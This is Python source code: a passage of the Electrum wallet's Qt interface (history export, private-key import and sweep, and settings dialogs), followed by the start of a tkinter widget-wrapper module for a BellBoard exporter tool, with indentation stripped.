self.show_critical(export_error_label + "\n" + str(reason), title=_("Unable to export history"))
return
self.show_message(_("Your wallet history has been successfully exported."))
def do_export_history(self, wallet, fileName, is_csv):
history = wallet.get_history()
lines = []
for item in history:
tx_hash, confirmations, value, timestamp, balance = item
if confirmations:
if timestamp is not None:
time_string = format_time(timestamp)
else:
time_string = "unknown"
else:
time_string = "unconfirmed"
if value is not None:
value_string = format_satoshis(value, True)
else:
value_string = '--'
if tx_hash:
label = wallet.get_label(tx_hash)
label = label.encode('utf-8')
else:
label = ""
if is_csv:
lines.append([tx_hash, label, confirmations, value_string, time_string])
else:
lines.append({'txid':tx_hash, 'date':"%16s"%time_string, 'label':label, 'value':value_string})
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f, lineterminator='\n')
transaction.writerow(["transaction_hash","label", "confirmations", "value", "timestamp"])
for line in lines:
transaction.writerow(line)
else:
import json
f.write(json.dumps(lines, indent = 4))
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_("Enter private keys:")))
keys_e = QTextEdit()
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses(self.current_account)
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text())
if bitcoin.is_address(addr):
return addr
def get_pk():
pk = str(keys_e.toPlainText()).strip()
if Wallet.is_private_key(pk):
return pk.split()
f = lambda: button.setEnabled(get_address() is not None and get_pk() is not None)
keys_e.textChanged.connect(f)
address_e.textChanged.connect(f)
if not d.exec_():
return
fee = self.wallet.fee_per_kb(self.config)
tx = Transaction.sweep(get_pk(), self.network, get_address(), fee)
if not tx:
self.show_message(_('No inputs found. (Note that inputs need to be confirmed)'))
return
self.warn_if_watching_only()
self.show_transaction(tx)
@protected
def do_import_privkey(self, password):
if not self.wallet.has_imported_keys():
if not self.question('<b>'+_('Warning') +':\n</b><br/>'+ _('Imported keys are not recoverable from seed.') + ' ' \
+ _('If you ever need to restore your wallet from its seed, these keys will be lost.') + '<p>' \
+ _('Are you sure you understand what you are doing?'), title=_('Warning')):
return
text = text_dialog(self, _('Import private keys'), _("Enter private keys")+':', _("Import"))
if not text: return
text = str(text).split()
badkeys = []
addrlist = []
for key in text:
try:
addr = self.wallet.import_key(key, password)
except Exception as e:
badkeys.append(key)
continue
if not addr:
badkeys.append(key)
else:
addrlist.append(addr)
if addrlist:
self.show_message(_("The following addresses were added") + ':\n' + '\n'.join(addrlist))
if badkeys:
self.show_critical(_("The following inputs could not be imported") + ':\n'+ '\n'.join(badkeys))
self.address_list.update()
self.history_list.update()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum.i18n import languages
lang_combo.addItems(languages.values())
try:
index = languages.keys().index(self.config.get("language",''))
except Exception:
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = languages.keys()[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
msg = '\n'.join([
_('Fee per kilobyte of transaction.')
])
fee_label = HelpLabel(_('Transaction fee per kb') + ':', msg)
fee_e = BTCkBEdit(self.get_decimal_point)
def on_fee(is_done):
if self.config.get('dynamic_fees'):
return
v = fee_e.get_amount() or 0
self.config.set_key('fee_per_kb', v, is_done)
self.update_fee()
fee_e.editingFinished.connect(lambda: on_fee(True))
fee_e.textEdited.connect(lambda: on_fee(False))
tx_widgets.append((fee_label, fee_e))
dynfee_cb = QCheckBox(_('Dynamic fees'))
dynfee_cb.setChecked(self.config.get('dynamic_fees', False))
dynfee_cb.setToolTip(_("Use a fee per kB value recommended by the server."))
dynfee_sl = QSlider(Qt.Horizontal, self)
# The pref is from 0 to 100; add 50 to get the factor from 50% to 150%
dynfee_sl.setRange(0, 100)
dynfee_sl.setTickInterval(10)
dynfee_sl.setTickPosition(QSlider.TicksBelow)
dynfee_sl.setValue(self.config.get('fee_factor', 50))
dynfee_sl.setToolTip("Min = 50%, Max = 150%")
multiplier_label = HelpLabel("", _("Multiply the recommended fee/kb value by a constant factor. Min = 50%, Max = 150%"))
tx_widgets.append((dynfee_cb, dynfee_sl))
tx_widgets.append((None, multiplier_label))
def update_feeperkb():
fee_e.setAmount(self.wallet.fee_per_kb(self.config))
b = self.config.get('dynamic_fees', False)
dynfee_sl.setEnabled(b)
multiplier_label.setEnabled(b)
fee_e.setEnabled(not b)
def slider_moved():
multiplier_label.setText(_('Fee multiplier: %3d%%')
% (dynfee_sl.sliderPosition() + 50))
def slider_released():
self.config.set_key('fee_factor', dynfee_sl.sliderPosition(), False)
update_feeperkb()
def on_dynfee(x):
dynfee = x == Qt.Checked
self.config.set_key('dynamic_fees', dynfee)
update_feeperkb()
dynfee_cb.stateChanged.connect(on_dynfee)
dynfee_sl.valueChanged.connect(slider_moved)
dynfee_sl.sliderReleased.connect(slider_released)
update_feeperkb()
slider_moved()
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see http://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet(GREEN_BG if validated else RED_BG)
else:
alias_e.setStyleSheet(RED_BG)
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.connect(self, SIGNAL('alias_received'), set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet(RED_BG if SSL_error else GREEN_BG if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = ['BTC', 'mBTC', 'bits']
msg = _('Base unit of your wallet.')\
+ '\n1BTC=1000mBTC.\n' \
+ _(' These settings affects the fields in the Send tab')+' '
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e, fee_e
amounts = [edit.get_amount() for edit in edits]
if unit_result == 'BTC':
self.decimal_point = 8
elif unit_result == 'mBTC':
self.decimal_point = 5
elif unit_result == 'bits':
self.decimal_point = 2
else:
raise Exception('Unknown base unit')
self.config.set_key('decimal_point', self.decimal_point, True)
self.history_list.update()
self.receive_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(on_unit)
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(block_explorer_info.keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_explorers.index(block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.\nOn linux, type: 'apt-get install python-zbar'")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.zbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", str(qr_combo.itemData(x).toString()), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transactions fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((usechange_cb, None))
tx_widgets.append((multiple_cb, None))
showtx_cb = QCheckBox(_('View transaction before signing'))
showtx_cb.setChecked(self.show_before_broadcast())
showtx_cb.stateChanged.connect(lambda x: self.set_show_before_broadcast(showtx_cb.isChecked()))
showtx_cb.setToolTip(_('Display the details of your transactions before signing it.'))
tx_widgets.append((showtx_cb, None))
can_edit_fees_cb = QCheckBox(_('Set transaction fees manually'))
can_edit_fees_cb.setChecked(self.config.get('can_edit_fees', False))
def on_editfees(x):
self.config.set_key('can_edit_fees', x == Qt.Checked)
self.update_fee_edit()
can_edit_fees_cb.stateChanged.connect(on_editfees)
can_edit_fees_cb.setToolTip(_('This option lets you edit fees in the send tab.'))
tx_widgets.append((can_edit_fees_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
tabs_info = [
(tx_widgets, _('Transactions')),
(gui_widgets, _('Appearance')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
self.disconnect(self, SIGNAL('alias_received'), set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def run_network_dialog(self):
if not self.network:
self.show_warning(_('You are using Electrum in offline mode; restart Electrum if you want to get connected'), title=_('Offline'))
return
NetworkDialog(self.wallet.network, self.config, self).do_exec()
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
name = descr['__name__']
p = plugins.get(name)
if descr.get('registers_wallet_type'):
continue
try:
cb = QCheckBox(descr['fullname'])
cb.setEnabled(plugins.is_available(name, self.wallet))
cb.setChecked(p is not None and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.print_msg("error: cannot display plugin", name)
traceback.print_exc(file=sys.stdout)
grid.setRowStretch(i+1,1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def show_account_details(self, k):
account = self.wallet.accounts[k]
d = WindowModalDialog(self, _('Account Details'))
vbox = QVBoxLayout(d)
name = self.wallet.get_account_name(k)
label = QLabel('Name: ' + name)
vbox.addWidget(label)
vbox.addWidget(QLabel(_('Address type') + ': ' + account.get_type()))
vbox.addWidget(QLabel(_('Derivation') + ': ' + k))
vbox.addWidget(QLabel(_('Master Public Key:')))
text = QTextEdit()
text.setReadOnly(True)
text.setMaximumHeight(170)
vbox.addWidget(text)
mpk_text = '\n'.join( account.get_master_pubkeys() )
text.setText(mpk_text)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
|
BellBoardExporter.py | import tkinter as tk
from tkinter import DISABLED, NORMAL, END
from tkinter import filedialog
from tkinter import ttk
import os
from platform import system
import sys
import threading
from threading import Thread
import queue
import requests
from PyPDF2 import PdfFileReader, PdfFileMerger
import io
class Text():
"""
The Text class, a custom class that wraps around a new instance of a tkinter Entrtexty widget.
"""
def __init__(self, frame, startingText=None, width=None, height=None,
background="grey",
padx=0, pady=0,
column=None, row=None, columnspan=1, rowspan=1, sticky="W"):
self.startingText = startingText
self.width=width
self.height=height
self.background = background
self.padx = padx
self.pady = pady
self.column = column
self.row = row
self.columnspan=columnspan
self.rowspan=rowspan
self.info_text = tk.Text(frame, cursor="",
#highlightbackground=self.background,
bg=self.background, width=self.width, height=self.height)
self.info_text.insert(END, self.startingText+"\n")
self.info_text.config(state=DISABLED)
self.info_text.grid(column=self.column, row=self.row, columnspan=self.columnspan, rowspan=self.rowspan, padx=self.padx, pady=self.pady)
class Label():
"""
The Label class, a custom class that wraps around a new instance of a tkinter Label widget.
"""
def __init__(self, frame, font, text=None,
foreground="black", background="white",
width=None, height=None,
padx=0, pady=0,
column=None, row=None, columnspan=1, rowspan=1, sticky="W"):
self.text = text
self.font = font
self.foreground = foreground
self.background = background
self.width = width
self.height = height
self.padx = padx
self.pady = pady
self.column = column
self.row = row
self.columnspan = columnspan
self.rowspan = rowspan
self.sticky = sticky
self.label = tk.Label(frame, text=self.text, font=self.font,
highlightbackground=self.background, fg=self.foreground, bg=self.background, width=self.width, height=self.height)
self.label.grid(padx=self.padx, pady=self.pady,
column=self.column, row=self.row, columnspan=self.columnspan, rowspan=self.rowspan,
sticky=self.sticky)
def update(self, text):
"""
Update the value of the Label to the specified value, text.
"""
self.label.configure(text=text)
class LabelFrame():
"""
The LabelFrame class, a custom class that wraps around a new instance of a tkinter LabelFrame widget.
"""
def __init__(self, frame, font, text=None,
foreground="black", background="white",
width=None, height=None,
padx=0, pady=0,
column=None, row=None, columnspan=1, rowspan=1, sticky="W"):
self.text = text
self.font = font
self.foreground = foreground
self.background = background
self.width = width
self.height = height
self.padx = padx
self.pady = pady
self.column = column
self.row = row
self.columnspan = columnspan
self.rowspan = rowspan
self.sticky = sticky
self.label = tk.LabelFrame(frame, text=self.text, font=self.font,
highlightbackground=self.background, fg=self.foreground, bg=self.background, width=self.width, height=self.height)
self.label.grid(padx=self.padx, pady=self.pady,
column=self.column, row=self.row, columnspan=self.columnspan, rowspan=self.rowspan,
sticky=self.sticky)
def update(self, text):
"""
Update the value of the LabelFrame to the specified value, text.
"""
self.label.configure(text=text)
class Entry():
"""
The Entry class, a custom class that wraps around a new instance of a tkinter Entry widget.
"""
def __init__(self, frame, textVariable="", sanatiseEntry=True, width=None, state="normal",
foreground="black", background="white",##3E4149",
padx=0, pady=0,
column=None, row=None, columnspan=1, rowspan=1, sticky="W"):
self.sanatiseEntry = sanatiseEntry
self.width=width
self.state=state,
self.foreground=foreground,
self.background=background,
self.padx=padx,
self.pady=pady
self.column=column
self.row=row
self.columnspan=columnspan
self.rowspan=rowspan
self.sticky=sticky
self.entryValue = textVariable
self.unsanatisedEntryValue = textVariable
self.entry = tk.Entry(frame, textvariable=self.entryValue, width=self.width, state=self.state,
highlightbackground=self.background, foreground=self.foreground, background=self.background,)
self.entry.grid(padx=self.padx, pady=self.pady,
column=self.column, row=self.row, columnspan=self.columnspan, rowspan=self.rowspan,
sticky=self.sticky)
def sanatise(self):
"""
Sanatise the current Entry value to match what's used on BellBoard.
"""
if self.sanatiseEntry == True:
self.entryValue = self.entryValue.replace(" ", "+")
self.entryValue = self.entryValue.replace("*", "%2A")
self.entryValue = self.entryValue.replace("/", "%2F")
def update(self):
"""
Update the variable that holds the Entry value to the currently given value within the Entry
and create both sanatised and unsanatised versions of it.
"""
self.entryValue = self.entry.get()
self.unsanatisedEntryValue = self.entryValue
self.sanatise()
def get(self, sanatise=True):
"""
Update the variable that holds the Entry value to the currently given value within the Entry,
sanatise it if specified to, and return the value.
"""
self.update()
if sanatise == True:
return self.entryValue
elif sanatise == False:
return self.unsanatisedEntryValue
else:
print('Error: Entry.get() option "sanatise" needs to be either a bool value or type None')
def set(self, textVariable):
"""
Set the value of the Entry to the given value, textVariable.
"""
self.entryValue = textVariable
self.unsanatisedEntryValue = self.entryValue
self.entry.delete(0, END)
self.entry.insert(0, textVariable)
self.sanatise()
def print(self):
"""
Print the current value of the Entry.
"""
print(self.entryValue)
class Checkbutton():
"""
The Checkbutton class, a custom class that wraps around a new instance of a tkinter Checkbutton widget.
"""
def __init__(self, frame, tag=None, text=None, checkState=False, state="normal",
foreground="black", background="white",
padx=0, pady=0,
column=None, row=None, columnspan=1, rowspan=1, sticky="W"):
self.tag = tag
self.text=text
self.foreground=foreground
self.background=background
self.padx=padx
self.pady=pady,
self.column=column
self.row=row
self.columnspan=columnspan
self.rowspan=rowspan
self.sticky=sticky
self.chk_state_var = tk.BooleanVar(value=checkState)
self.checkbox = tk.Checkbutton(frame, text=self.text, variable=self.chk_state_var,
onvalue=True, offvalue=False,
highlightbackground=self.background, foreground=self.foreground, background=self.background,
command=self.cb)
self.checkbox.grid(padx=self.padx, pady=self.pady,
column=self.column, row=self.row, columnspan=self.columnspan, rowspan=self.rowspan,
sticky=self.sticky)
def cb(self):
"""
Runs given function when the value of the Checkbutton is changed.
"""
if self.tag is None:
print("Check state variable is", self.chk_state_var.get())
else:
print("{} is {}".format(self.tag, self.chk_state_var.get()))
def get(self):
"""
Get the value of the Checkbutton.
"""
return self.chk_state_var.get()
def set(self, value):
"""
Set the value of the Checkbutton.
"""
self.chk_state_var.set(value)
class Button():
"""
The Button class, a custom class that wraps around a new instance of a tkinter Button widget.
"""
def __init__(self, frame, options, tag=None, text=None, state="normal",
foreground="black", background="white", command=None,
padx=0, pady=0,
column=None, row=None, columnspan=1, rowspan=1, sticky="W"):
self.tag = tag
self.options=options
self.text=text
self.command = command
self.foreground=foreground
self.background=background
self.padx=padx
self.pady=pady,
self.column=column
self.row=row
self.columnspan=columnspan
self.rowspan=rowspan
self.sticky=sticky
self.button = tk.Button(frame, text=self.text, highlightbackground=self.background, background=self.background, foreground=self.foreground,
command=self.clicked)
self.button.grid(padx=self.padx, pady=self.pady,
column=self.column, row=self.row, columnspan=self.columnspan, rowspan=self.rowspan,
sticky=self.sticky)
def clicked(self):
"""
Run given function when Button is clicked.
"""
if self.command is not None:
self.command()
class Combobox():
"""
The Combobox class, a custom class that wraps around a new instance of a tkinter Combobox widget.
"""
def __init__(self, frame, tag=None, menuOptions=None, width=None, state="normal",
foreground="black", background="white",
padx=0, pady=0,
column=None, row=None, columnspan=1, rowspan=1, sticky="W"):
self.tag=tag,
self.menuOptions = menuOptions
self.width = width
self.foreground=foreground
self.background=background
self.padx=padx
self.pady=pady
self.column=column
self.row=row
self.columnspan=columnspan
self.rowspan=rowspan
self.sticky=sticky
self.menuValue = tk.StringVar()
self.menuValue.set(self.menuOptions[0]) # default value
self.combobox = ttk.Combobox(frame, textvariable=self.menuValue, values=self.menuOptions, width=width, state='readonly')
self.combobox.configure(background=self.background, foreground=self.foreground)
self.combobox.bind("<<ComboboxSelected>>", self.dropdown_callback)
self.combobox.grid(padx=self.padx, pady=self.pady,
column=self.column, row=self.row, columnspan=self.columnspan, rowspan=self.rowspan,
sticky=self.sticky)
def get(self):
"""
Returns the currently selected Combobox value.
"""
return self.menuValue.get()
def dropdown_callback(self, selected=None):
"""
Print Combobox value when it is changed to a new value.
"""
print("{} set to {}".format(self.tag[0], self.menuValue.get()))
if len(self.tag) > 1:
print("Warning: tag with unexpected length: {}".format(self.tag))
class BrowseButton():
def __init__(self, frame, options, tag=None,
browseType="browsePath", text="", startingFileName="", title="",
command=None,
state="normal",
width=None, foreground="black", background="white",
padx=0, pady=0,
column=None, row=None, columnspan=1, rowspan=1, sticky="W"):
self.options = options
self.tag = tag
self.browseType = browseType
self.text = text
self.fileName = startingFileName
self.title = title
self.extraCommand = command
self.state = state
self.width = width
self.foreground = foreground
self.background = background
self.padx = padx
self.pady = pady
self.column = column
self.row = row
self.columnspan = columnspan
self.rowspan = rowspan
self.sticky = sticky
#self.fileTypes = (("PDF Files", "*.pdf"), ("CSV Files", "*.csv"), ("All Files", "."))
if self.browseType == "browsePath":
self.clickedFunction = self._askDirectory
elif self.browseType == "selectFile":
self.clickedFunction = self._selectFile
else:
print("Error: incorrect browseType passed into BrowseButton")
self.button = Button(frame, options, tag=self.tag, text=self.text,
background=self.background, foreground=self.foreground,
command=self.clickedFunction,
state=self.state,
padx=self.padx, pady=self.pady,
column=self.column, row=self.row, columnspan=self.columnspan, rowspan=self.rowspan, sticky=self.sticky)
def _askDirectory(self):
fileNameTmp = os.path.join(filedialog.askdirectory(initialdir=self.fileName, title=self.title), "")
if fileNameTmp != "" and not isinstance(fileNameTmp, tuple):
self.fileName = fileNameTmp
if self.extraCommand != None:
self.extraCommand(self.fileName)
if fileNameTmp != "" and not isinstance(fileNameTmp, tuple):
print("Directory Selected: {}".format(self.fileName))
def _selectFile(self):
fileNameTmp = filedialog.asksaveasfilename(initialdir=self.fileName, title=self.title)#, filetypes=self.fileTypes)
if fileNameTmp != "" and not isinstance(fileNameTmp, tuple):
self.fileName = fileNameTmp
if "." in self.fileName:
self.fileName = self.fileName.split(".", 1)[0]
if self.extraCommand != None:
self.extraCommand(self.fileName)
if fileNameTmp != "" and not isinstance(fileNameTmp, tuple):
print("File Selected: {}".format(self.fileName))
def get(self):
return self.fileName
class BBOption():
"""
The BBOption class (BellBoardOption). A class the holds all the tkinter widgets used within the given frame,
for easy access to each one, and their values etc.
"""
def __init__(self, frame, state, background, fontDefault, pad):
self.frame = frame
self.state = state
self.backgroundColour = background
del background
self.fontDefault = fontDefault
self.pad = pad
self.label = {}
self.entry = {}
self.checkbox = {}
self.button = {}
self.browseButton = {}
self.combobox = {}
def updateState(self, state):
for ent in self.entry:
self.entry[ent].entry.config(state=state)
for chk in self.checkbox:
self.checkbox[chk].checkbox.config(state=state)
for btn in self.button:
self.button[btn].button.config(state=state)
for btn in self.browseButton:
self.browseButton[btn].button.button.config(state=state)
for cbx in self.combobox:
self.combobox[cbx].combobox.config(state=state)
def add_label(self, tag, text=None, font=None,
width=None, height=None,
foreground="black", background=None, padx=None, pady=None,
column=None, row=None, columnspan=1, rowspan=1, sticky="W"):
"""
Function to add a tkinter Label to the frame. Does this by creating an instance of the custom Label
wrapper class.
"""
if font is None:
font = self.fontDefault
if background is None:
background = self.backgroundColour
if padx is None:
padx = self.pad['x']['none']
if pady is None:
pady = self.pad['y']['none']
self.label[tag] = Label(self.frame, text=text, font=font,
width=width, height=height,
foreground=foreground, background=background,
padx=padx, pady=pady,
column=column, row=row, columnspan=columnspan, rowspan=rowspan, sticky=sticky)
def add_labelFrame(self, tag, text=None, font=None,
width=None, height=None,
foreground="black", background=None, padx=None, pady=None,
column=None, row=None, columnspan=1, rowspan=1, sticky="W"):
"""
Function to add a tkinter LabelFrame to the frame. Does this by creating an instance of the custom LabelFrame
wrapper class.
"""
if font is None:
font = self.fontDefault
if background is None:
background = self.backgroundColour
if padx is None:
padx = self.pad['x']['none']
if pady is None:
pady = self.pad['y']['none']
self.label[tag] = LabelFrame(self.frame, text=text, font=font,
width=width, height=height,
foreground=foreground, background=background,
padx=padx, pady=pady,
column=column, row=row, columnspan=columnspan, rowspan=rowspan, sticky=sticky)
def add_entry(self, tag, sanatiseEntry=True, width=None,
foreground="black", background="white", padx=None, pady=None,
column=None, row=None, columnspan=1, rowspan=1, sticky="W"):
"""
Function to add a tkinter Entry to the frame. Does this by creating an instance of the custom Entry
wrapper class.
"""
if padx is None:
padx = self.pad['x']['none']
if pady is None:
pady = self.pad['y']['none']
self.entry[tag] = Entry(self.frame, sanatiseEntry=sanatiseEntry, width=width, state=self.state,
foreground=foreground, background=background,
padx=padx, pady=pady,
column=column, row=row, columnspan=columnspan, rowspan=rowspan, sticky=sticky)
def add_checkbox(self, tag, text=None, checkState=False,
foreground="black", background=None, padx=None, pady=None,
column=None, row=None, columnspan=1, rowspan=1, sticky="W"):
"""
Function to add a tkinter Checkbutton to the frame. Does this by creating an instance of the custom Checkbutton
wrapper class.
"""
if background is None:
background = self.backgroundColour
if padx is None:
padx = self.pad['x']['none']
if pady is None:
pady = self.pad['y']['none']
self.checkbox[tag] = Checkbutton(self.frame, tag=tag, text=text, checkState=checkState,
state=self.state,
foreground=foreground, background=background,
padx=padx, pady=pady,
column=column, row=row, columnspan=columnspan, rowspan=rowspan, sticky=sticky)
def add_button(self, tag, options, text=None, command=None,
foreground="black", background=None, padx=None, pady=None,
column=None, row=None, columnspan=1, rowspan=1, sticky="W"):
"""
Function to add a tkinter Button to the frame. Does this by creating an instance of the custom Button
wrapper class.
"""
if background is None:
background = self.backgroundColour
if padx is None:
padx = self.pad['x']['none']
if pady is None:
pady = self.pad['y']['none']
self.button[tag] = Button(self.frame, tag=tag, options=options, text=text, command=command,
state=self.state,
foreground=foreground, background=background, padx=padx, pady=pady,
column=column, row=row, columnspan=columnspan, rowspan=rowspan, sticky=sticky)
def add_browseButton(self, tag, options, text=None, startingFileName=None, browseType="selectFile",
command=None,
background=None,
padx=None,
pady=None,
column=None, row=None, columnspan=1, rowspan=1, sticky="W"):
if background is None:
background = self.backgroundColour
if padx is None:
padx = self.pad['x']['none']
if pady is None:
pady = self.pad['y']['none']
